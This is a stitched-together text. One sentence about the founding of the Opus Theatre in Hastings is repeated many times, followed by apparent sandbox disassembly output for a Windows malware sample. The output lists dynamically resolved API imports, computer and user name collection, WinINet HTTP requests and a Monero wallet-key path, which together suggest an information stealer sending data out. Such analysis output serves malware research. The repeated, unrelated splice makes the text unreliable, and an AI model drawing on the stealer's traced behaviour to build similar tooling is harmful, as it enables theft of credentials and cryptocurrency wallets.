British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 6a44b80b4f9054a62780004527e23231f8974511fd930edba4e7aff4fce9272f
                  • Instruction ID: fedf854bc0976856d3ca049c177c4b6d32138cc98af4d0f3a50937e2e37712cc
                  • Opcode Fuzzy Hash: 6a44b80b4f9054a62780004527e23231f8974511fd930edba4e7aff4fce9272f
                  • Instruction Fuzzy Hash: FC4106607C6784EACE2DB7A4884ED9D7B56FF42744F546088AC36A2780CBB46E82C715

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 874880-874942 call 88a7a0 call 8747b0 call 88a740 * 5 InternetOpenA StrCmpCA 816 874944 801->816 817 87494b-87494f 801->817 816->817 818 874955-874acd call 888b60 call 88a920 call 88a8a0 call 88a800 * 2 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a920 call 88a8a0 call 88a800 * 2 InternetConnectA 817->818 819 874ecb-874ef3 InternetCloseHandle call 88aad0 call 879ac0 817->819 818->819 905 874ad3-874ad7 818->905 829 874ef5-874f2d call 88a820 call 88a9b0 call 88a8a0 call 88a800 819->829 830 874f32-874fa2 call 888990 * 2 call 88a7a0 call 88a800 * 8 819->830 829->830 906 874ae5 905->906 907 874ad9-874ae3 905->907 908 874aef-874b22 HttpOpenRequestA 906->908 907->908 909 874ebe-874ec5 InternetCloseHandle 908->909 910 874b28-874e28 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a9b0 call 88a8a0 call 88a800 call 88a920 call 88a8a0 call 88a800 call 88a740 call 88a920 * 2 call 88a8a0 call 88a800 * 2 call 88aad0 lstrlen call 88aad0 * 2 lstrlen call 88aad0 HttpSendRequestA 908->910 909->819 1021 874e32-874e5c InternetReadFile 910->1021 1022 874e67-874eb9 InternetCloseHandle call 88a800 1021->1022 1023 874e5e-874e65 1021->1023 1022->909 1023->1022 1024 874e69-874ea7 call 88a9b0 call 88a8a0 call 88a800 1023->1024 1024->1021
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                    • Part of subcall function 008747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00874915
                  • StrCmpCA.SHLWAPI(?,015DE4A0), ref: 0087493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00874ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00890DDB,00000000,?,?,00000000,?,",00000000,?,015DE480), ref: 00874DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00874E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00874E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00874E49
                  • InternetCloseHandle.WININET(00000000), ref: 00874EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00874EC5
                  • HttpOpenRequestA.WININET(00000000,015DE530,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00874B15
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • InternetCloseHandle.WININET(00000000), ref: 00874ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 8aebdeafc9a710ef3c9ef02d958d538e1fd66e156c92de79139917ca22700e6f
                  • Instruction ID: 09b83be20466bbf8002e563bf4d2cc626db68f731fc69775857941e3ef92df17
                  • Opcode Fuzzy Hash: 8aebdeafc9a710ef3c9ef02d958d538e1fd66e156c92de79139917ca22700e6f
                  • Instruction Fuzzy Hash: 6712DB71910118AAEB19FB94DD92FEEB738FF14300F5041AAB116A24D1DF742B4ACB63
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00887917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0088792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 5205245bdd5ec9b14474ca45e6ed78966b0e945eb3122924b82dd921de1100eb
                  • Instruction ID: 3b2cf77fcb84e2bc56e023ceb016af1d943efdfdf42f8e4fe46b57c27fd86b50
                  • Opcode Fuzzy Hash: 5205245bdd5ec9b14474ca45e6ed78966b0e945eb3122924b82dd921de1100eb
                  • Instruction Fuzzy Hash: C00186B1944208EFC700EFD4DD45BAABBB8F704B21F104219F645E3690D37859448BA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008711B7), ref: 00887880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00887887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0088789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 63d3bd21f59375b185e5e3d9bdbb316ad79f59c80579a0a41bdd6fccd0e4018f
                  • Instruction ID: 086a405b1fc9485e23104915dccc41b065b6f2028a2f2c1413dff90e57f5cbd2
                  • Opcode Fuzzy Hash: 63d3bd21f59375b185e5e3d9bdbb316ad79f59c80579a0a41bdd6fccd0e4018f
                  • Instruction Fuzzy Hash: CDF04FB2944208ABC700DFD8DD49FAEBBB8FB04721F10025AFA15E2690C77955058BA1
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 9260de09c41f17a84ec792a98a4dea6bf17d95d943ccaa0626e3e9a6fec9a82b
                  • Instruction ID: 8c604bde30741945cd6d85c5db616081e4a03a3662f1f3f2b5503024cc4a09d5
                  • Opcode Fuzzy Hash: 9260de09c41f17a84ec792a98a4dea6bf17d95d943ccaa0626e3e9a6fec9a82b
                  • Instruction Fuzzy Hash: 9BD05E7490430CDBCB00DFE0D8896DDBB78FB08321F001694D905A2351EA3194C2CBA6

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 889c10-889c1a 634 889c20-88a031 GetProcAddress * 43 633->634 635 88a036-88a0ca LoadLibraryA * 8 633->635 634->635 636 88a0cc-88a141 GetProcAddress * 5 635->636 637 88a146-88a14d 635->637 636->637 638 88a153-88a211 GetProcAddress * 8 637->638 639 88a216-88a21d 637->639 638->639 640 88a298-88a29f 639->640 641 88a21f-88a293 GetProcAddress * 5 639->641 642 88a2a5-88a332 GetProcAddress * 6 640->642 643 88a337-88a33e 640->643 641->640 642->643 644 88a41f-88a426 643->644 645 88a344-88a41a GetProcAddress * 9 643->645 646 88a428-88a49d GetProcAddress * 5 644->646 647 88a4a2-88a4a9 644->647 645->644 646->647 648 88a4ab-88a4d7 GetProcAddress * 2 647->648 649 88a4dc-88a4e3 647->649 648->649 650 88a515-88a51c 649->650 651 88a4e5-88a510 GetProcAddress * 2 649->651 652 88a612-88a619 650->652 653 88a522-88a60d GetProcAddress * 10 650->653 651->650 654 88a61b-88a678 GetProcAddress * 4 652->654 655 88a67d-88a684 652->655 653->652 654->655 656 88a69e-88a6a5 655->656 657 88a686-88a699 GetProcAddress 655->657 658 88a708-88a709 656->658 659 88a6a7-88a703 GetProcAddress * 4 656->659 657->656 659->658
                  APIs
                  • GetProcAddress.KERNEL32(75900000,015C67C0), ref: 00889C2D
                  • GetProcAddress.KERNEL32(75900000,015C6860), ref: 00889C45
                  • GetProcAddress.KERNEL32(75900000,015D8F70), ref: 00889C5E
                  • GetProcAddress.KERNEL32(75900000,015D8F88), ref: 00889C76
                  • GetProcAddress.KERNEL32(75900000,015DC868), ref: 00889C8E
                  • GetProcAddress.KERNEL32(75900000,015DC910), ref: 00889CA7
                  • GetProcAddress.KERNEL32(75900000,015CB1D0), ref: 00889CBF
                  • GetProcAddress.KERNEL32(75900000,015DCA78), ref: 00889CD7
                  • GetProcAddress.KERNEL32(75900000,015DC820), ref: 00889CF0
                  • GetProcAddress.KERNEL32(75900000,015DC9E8), ref: 00889D08
                  • GetProcAddress.KERNEL32(75900000,015DCAA8), ref: 00889D20
                  • GetProcAddress.KERNEL32(75900000,015C6720), ref: 00889D39
                  • GetProcAddress.KERNEL32(75900000,015C68C0), ref: 00889D51
                  • GetProcAddress.KERNEL32(75900000,015C68E0), ref: 00889D69
                  • GetProcAddress.KERNEL32(75900000,015C6800), ref: 00889D82
                  • GetProcAddress.KERNEL32(75900000,015DC838), ref: 00889D9A
                  • GetProcAddress.KERNEL32(75900000,015DC850), ref: 00889DB2
                  • GetProcAddress.KERNEL32(75900000,015CB220), ref: 00889DCB
                  • GetProcAddress.KERNEL32(75900000,015C6940), ref: 00889DE3
                  • GetProcAddress.KERNEL32(75900000,015DC7F0), ref: 00889DFB
                  • GetProcAddress.KERNEL32(75900000,015DC970), ref: 00889E14
                  • GetProcAddress.KERNEL32(75900000,015DC940), ref: 00889E2C
                  • GetProcAddress.KERNEL32(75900000,015DC880), ref: 00889E44
                  • GetProcAddress.KERNEL32(75900000,015C6960), ref: 00889E5D
                  • GetProcAddress.KERNEL32(75900000,015DC958), ref: 00889E75
                  • GetProcAddress.KERNEL32(75900000,015DC8F8), ref: 00889E8D
                  • GetProcAddress.KERNEL32(75900000,015DC988), ref: 00889EA6
                  • GetProcAddress.KERNEL32(75900000,015DCA18), ref: 00889EBE
                  • GetProcAddress.KERNEL32(75900000,015DC898), ref: 00889ED6
                  • GetProcAddress.KERNEL32(75900000,015DC8B0), ref: 00889EEF
                  • GetProcAddress.KERNEL32(75900000,015DCA30), ref: 00889F07
                  • GetProcAddress.KERNEL32(75900000,015DCA60), ref: 00889F1F
                  • GetProcAddress.KERNEL32(75900000,015DC8C8), ref: 00889F38
                  • GetProcAddress.KERNEL32(75900000,015D9918), ref: 00889F50
                  • GetProcAddress.KERNEL32(75900000,015DC8E0), ref: 00889F68
                  • GetProcAddress.KERNEL32(75900000,015DC928), ref: 00889F81
                  • GetProcAddress.KERNEL32(75900000,015C6A00), ref: 00889F99
                  • GetProcAddress.KERNEL32(75900000,015DC9A0), ref: 00889FB1
                  • GetProcAddress.KERNEL32(75900000,015C6760), ref: 00889FCA
                  • GetProcAddress.KERNEL32(75900000,015DCA90), ref: 00889FE2
                  • GetProcAddress.KERNEL32(75900000,015DC9B8), ref: 00889FFA
                  • GetProcAddress.KERNEL32(75900000,015C6500), ref: 0088A013
                  • GetProcAddress.KERNEL32(75900000,015C65C0), ref: 0088A02B
                  • LoadLibraryA.KERNEL32(015DC808,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A03D
                  • LoadLibraryA.KERNEL32(015DCAD8,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A04E
                  • LoadLibraryA.KERNEL32(015DC9D0,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A060
                  • LoadLibraryA.KERNEL32(015DCAC0,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A072
                  • LoadLibraryA.KERNEL32(015DCA00,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A083
                  • LoadLibraryA.KERNEL32(015DCA48,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A095
                  • LoadLibraryA.KERNEL32(015DCB50,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A0A7
                  • LoadLibraryA.KERNEL32(015DCD48,?,00885CA3,00890AEB,?,?,?,?,?,?,?,?,?,?,00890AEA,00890AE3), ref: 0088A0B8
                  • GetProcAddress.KERNEL32(75FD0000,015C6520), ref: 0088A0DA
                  • GetProcAddress.KERNEL32(75FD0000,015DCB20), ref: 0088A0F2
                  • GetProcAddress.KERNEL32(75FD0000,015D8970), ref: 0088A10A
                  • GetProcAddress.KERNEL32(75FD0000,015DCDC0), ref: 0088A123
                  • GetProcAddress.KERNEL32(75FD0000,015C6440), ref: 0088A13B
                  • GetProcAddress.KERNEL32(735C0000,015CB270), ref: 0088A160
                  • GetProcAddress.KERNEL32(735C0000,015C63E0), ref: 0088A179
                  • GetProcAddress.KERNEL32(735C0000,015CB130), ref: 0088A191
                  • GetProcAddress.KERNEL32(735C0000,015DCD90), ref: 0088A1A9
                  • GetProcAddress.KERNEL32(735C0000,015DCBC8), ref: 0088A1C2
                  • GetProcAddress.KERNEL32(735C0000,015C6480), ref: 0088A1DA
                  • GetProcAddress.KERNEL32(735C0000,015C64E0), ref: 0088A1F2
                  • GetProcAddress.KERNEL32(735C0000,015DCD60), ref: 0088A20B
                  • GetProcAddress.KERNEL32(763B0000,015C65E0), ref: 0088A22C
                  • GetProcAddress.KERNEL32(763B0000,015C62A0), ref: 0088A244
                  • GetProcAddress.KERNEL32(763B0000,015DCB98), ref: 0088A25D
                  • GetProcAddress.KERNEL32(763B0000,015DCB68), ref: 0088A275
                  • GetProcAddress.KERNEL32(763B0000,015C65A0), ref: 0088A28D
                  • GetProcAddress.KERNEL32(750F0000,015CAF00), ref: 0088A2B3
                  • GetProcAddress.KERNEL32(750F0000,015CB018), ref: 0088A2CB
                  • GetProcAddress.KERNEL32(750F0000,015DCC70), ref: 0088A2E3
                  • GetProcAddress.KERNEL32(750F0000,015C62C0), ref: 0088A2FC
                  • GetProcAddress.KERNEL32(750F0000,015C64C0), ref: 0088A314
                  • GetProcAddress.KERNEL32(750F0000,015CAF78), ref: 0088A32C
                  • GetProcAddress.KERNEL32(75A50000,015DCDD8), ref: 0088A352
                  • GetProcAddress.KERNEL32(75A50000,015C6540), ref: 0088A36A
                  • GetProcAddress.KERNEL32(75A50000,015D89E0), ref: 0088A382
                  • GetProcAddress.KERNEL32(75A50000,015DCAF0), ref: 0088A39B
                  • GetProcAddress.KERNEL32(75A50000,015DCD00), ref: 0088A3B3
                  • GetProcAddress.KERNEL32(75A50000,015C6380), ref: 0088A3CB
                  • GetProcAddress.KERNEL32(75A50000,015C6460), ref: 0088A3E4
                  • GetProcAddress.KERNEL32(75A50000,015DCC28), ref: 0088A3FC
                  • GetProcAddress.KERNEL32(75A50000,015DCC10), ref: 0088A414
                  • GetProcAddress.KERNEL32(75070000,015C63A0), ref: 0088A436
                  • GetProcAddress.KERNEL32(75070000,015DCD30), ref: 0088A44E
                  • GetProcAddress.KERNEL32(75070000,015DCCD0), ref: 0088A466
                  • GetProcAddress.KERNEL32(75070000,015DCB38), ref: 0088A47F
                  • GetProcAddress.KERNEL32(75070000,015DCD18), ref: 0088A497
                  • GetProcAddress.KERNEL32(74E50000,015C6560), ref: 0088A4B8
                  • GetProcAddress.KERNEL32(74E50000,015C6340), ref: 0088A4D1
                  • GetProcAddress.KERNEL32(75320000,015C6640), ref: 0088A4F2
                  • GetProcAddress.KERNEL32(75320000,015DCB80), ref: 0088A50A
                  • GetProcAddress.KERNEL32(6F060000,015C6300), ref: 0088A530
                  • GetProcAddress.KERNEL32(6F060000,015C64A0), ref: 0088A548
                  • GetProcAddress.KERNEL32(6F060000,015C6600), ref: 0088A560
                  • GetProcAddress.KERNEL32(6F060000,015DCB08), ref: 0088A579
                  • GetProcAddress.KERNEL32(6F060000,015C6580), ref: 0088A591
                  • GetProcAddress.KERNEL32(6F060000,015C6620), ref: 0088A5A9
                  • GetProcAddress.KERNEL32(6F060000,015C6660), ref: 0088A5C2
                  • GetProcAddress.KERNEL32(6F060000,015C62E0), ref: 0088A5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0088A5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0088A607
                  • GetProcAddress.KERNEL32(74E00000,015DCBB0), ref: 0088A629
                  • GetProcAddress.KERNEL32(74E00000,015D87F0), ref: 0088A641
                  • GetProcAddress.KERNEL32(74E00000,015DCBF8), ref: 0088A659
                  • GetProcAddress.KERNEL32(74E00000,015DCD78), ref: 0088A672
                  • GetProcAddress.KERNEL32(74DF0000,015C6280), ref: 0088A693
                  • GetProcAddress.KERNEL32(6F9C0000,015DCCE8), ref: 0088A6B4
                  • GetProcAddress.KERNEL32(6F9C0000,015C6320), ref: 0088A6CD
                  • GetProcAddress.KERNEL32(6F9C0000,015DCBE0), ref: 0088A6E5
                  • GetProcAddress.KERNEL32(6F9C0000,015DCDA8), ref: 0088A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: d89504c7227499eb8f51b3f024be0fd5a022e736f058c315b48796cdaa2b62b7
                  • Instruction ID: 42076c22eb6120eccbd8fcbb990e4822d0276b06cbab531d4ee3fd562e816c7d
                  • Opcode Fuzzy Hash: d89504c7227499eb8f51b3f024be0fd5a022e736f058c315b48796cdaa2b62b7
                  • Instruction Fuzzy Hash: 27622EB6508240AFC354DFE8FD989563BF9F76C301B14871AA609C3676DA3A9483DF12

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1033 876280-87630b call 88a7a0 call 8747b0 call 88a740 InternetOpenA StrCmpCA 1040 876314-876318 1033->1040 1041 87630d 1033->1041 1042 87631e-876342 InternetConnectA 1040->1042 1043 876509-876525 call 88a7a0 call 88a800 * 2 1040->1043 1041->1040 1045 8764ff-876503 InternetCloseHandle 1042->1045 1046 876348-87634c 1042->1046 1062 876528-87652d 1043->1062 1045->1043 1048 87634e-876358 1046->1048 1049 87635a 1046->1049 1050 876364-876392 HttpOpenRequestA 1048->1050 1049->1050 1052 8764f5-8764f9 InternetCloseHandle 1050->1052 1053 876398-87639c 1050->1053 1052->1045 1055 8763c5-876405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 87639e-8763bf InternetSetOptionA 1053->1056 1058 876407-876427 call 88a740 call 88a800 * 2 1055->1058 1059 87642c-87644b call 888940 1055->1059 1056->1055 1058->1062 1067 87644d-876454 1059->1067 1068 8764c9-8764e9 call 88a740 call 88a800 * 2 1059->1068 1071 8764c7-8764ef InternetCloseHandle 1067->1071 1072 876456-876480 InternetReadFile 1067->1072 1068->1062 1071->1052 1073 876482-876489 1072->1073 1074 87648b 1072->1074 1073->1074 1078 87648d-8764c5 call 88a9b0 call 88a8a0 call 88a800 1073->1078 1074->1071 